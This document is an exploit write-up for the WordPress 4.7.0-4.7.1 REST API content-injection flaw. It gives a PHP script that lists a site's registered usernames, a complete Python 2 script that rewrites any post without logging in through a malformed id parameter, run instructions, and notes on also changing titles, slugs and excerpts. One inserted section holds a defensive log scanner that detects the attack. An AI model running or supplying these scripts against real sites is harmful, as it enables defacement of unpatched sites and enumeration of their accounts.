WordPress 4.7.0-4.7.1 content injection

I. Obtaining the registered usernames

Exploit URL: http://127.0.0.1/wordpress-4.7.1/wp-json/wp/v2/users/

Or use the PHP code below; $url must be changed to the target site.

<?php
header('Content-type: text/html; charset=UTF-8');
$url     = "http://xxxx.cn/";           // base URL of the target site, change this
$payload = "wp-json/wp/v2/users/";      // REST users endpoint
$urli = file_get_contents($url . $payload);
$json = json_decode($urli, true);
if ($json) {
    echo "*-----------------------------*\n";
    foreach ($json as $users) {
        echo "[*] ID :  |" . $users['id']   . "|\n";
        echo "[*] Name: |" . $users['name'] . "|\n";
        echo "[*] User :|" . $users['slug'] . "|\n";
        echo "\n";
    }
    echo "*-----------------------------*";
} else {
    echo "[*] No user";
}
?>

II. Unauthenticated modification of any post's content

Exploit:

1. Get all post IDs

http://192.168.150.149//index.php/wp-json/wp/v2/posts

2. Use the exploit

# Python 2 script (urllib2, reload(sys)); requires python-lxml
import json
import sys
import urllib2
reload(sys)
sys.setdefaultencoding("utf-8")

from lxml import etree


def get_api_url(wordpress_url):
    # discover the REST API base from the <link rel="https://api.w.org/"> tag on the front page
    response = urllib2.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u


def get_posts(api_base):
    # list every post id, title and link exposed by the public posts endpoint
    response = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(response.read())
    for post in posts:
        print(' - Post ID: {}, Title: {}, Url: {}'
              .format(post['id'], post['title']['rendered'], post['link']))


def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })

    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()

    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))


def print_usage():
    print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))


if __name__ == '__main__':
    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)
    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {}'.format(api_url))

    # if we only have a url, show the posts we have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)
        sys.exit(0)
    # if we get here, we have what we need to update a post!
    print('* Updating post {}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()
    update_post(api_url, sys.argv[2], ''.join(new_content))
    print('* Update complete!')


3. Usage

Save the exploit as wp.py, then create a file named content in the same directory (the content file holds the new text for the post to be modified).

python-lxml must be installed:

Linux: apt-get install python-lxml or yum install python-lxml

Run: python wp.py http://192.168.1.1/ <post id> content
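As a defensive counterpart to the procedure above (added here; not part of the original post), this Python 3 script scans web-server access-log lines for the request shape the exploit sends: a write to the posts route whose `id` query value is not purely numeric, as in `posts/1/?id=1abc`. The log lines, IP addresses and log format are constructed samples, and the script also covers the `rest_route` form used when permalinks are disabled.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Feb/2017:10:00:01 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "python-urllib2"
192.0.2.10 - - [01/Feb/2017:10:00:02 +0000] "POST /wp-json/wp/v2/posts/1/?id=1abc HTTP/1.1" 200 812 "-" "python-urllib2"
192.0.2.20 - - [01/Feb/2017:10:00:03 +0000] "POST /wp-json/wp/v2/posts/4 HTTP/1.1" 401 96 "-" "Mozilla/5.0"
192.0.2.30 - - [01/Feb/2017:10:00:04 +0000] "GET /index.php/wp-json/wp/v2/posts/7?id=7 HTTP/1.1" 200 1100 "-" "Mozilla/5.0"
192.0.2.40 - - [01/Feb/2017:10:00:05 +0000] "PUT /index.php/wp-json/wp/v2/posts/7?id=7%20 HTTP/1.1" 200 1100 "-" "curl/7.47"
192.0.2.50 - - [01/Feb/2017:10:00:06 +0000] "POST /?rest_route=/wp/v2/posts/3&id=3abc HTTP/1.1" 200 790 "-" "curl/7.47"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# matches both /wp-json/wp/v2/posts/<n> and the rest_route value /wp/v2/posts/<n>
POSTS_ROUTE_RE = re.compile(r'/wp/v2/posts/(?P<route_id>\d+)/?$')
WRITE_METHODS = {"POST", "PUT", "PATCH"}


def is_suspicious_request(method, target):
    """True when a write to the posts route carries an `id` query value that is not all digits.

    The route id is numeric; the query-string id (e.g. 1abc, or 7%20 after decoding) is the
    marker of the bypass request the exploit above issues."""
    if method not in WRITE_METHODS:
        return False
    parsed = urlparse(target)
    qs = parse_qs(parsed.query, keep_blank_values=True)
    path = parsed.path
    if "rest_route" in qs:          # sites without permalinks pass the route as a parameter
        path = qs["rest_route"][0]
    if not POSTS_ROUTE_RE.search(path):
        return False
    return any(not value.isdigit() for value in qs.get("id", []))


def scan_log(text):
    """Return (ip, timestamp, method, target) for every flagged request in an access log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious_request(m["method"], m["target"]):
            hits.append((m["ip"], m["ts"], m["method"], m["target"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("ALERT non-numeric post id on REST write: %s %s %s %s" % hit)
```

A 200 response on such a request is the stronger signal; a 4xx means the request was rejected, so correlating the status column with the flagged lines narrows the alert list.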

4. Extension

How to modify the post title, slug, excerpt and other fields.

The data parameter (the JSON body built in update_post, which above only sends content) should be an object containing the following key/value pairs.

title – post title (string) required

content_raw – post content (string) required

excerpt_raw – post excerpt (string) optional

name – post slug (string) optional
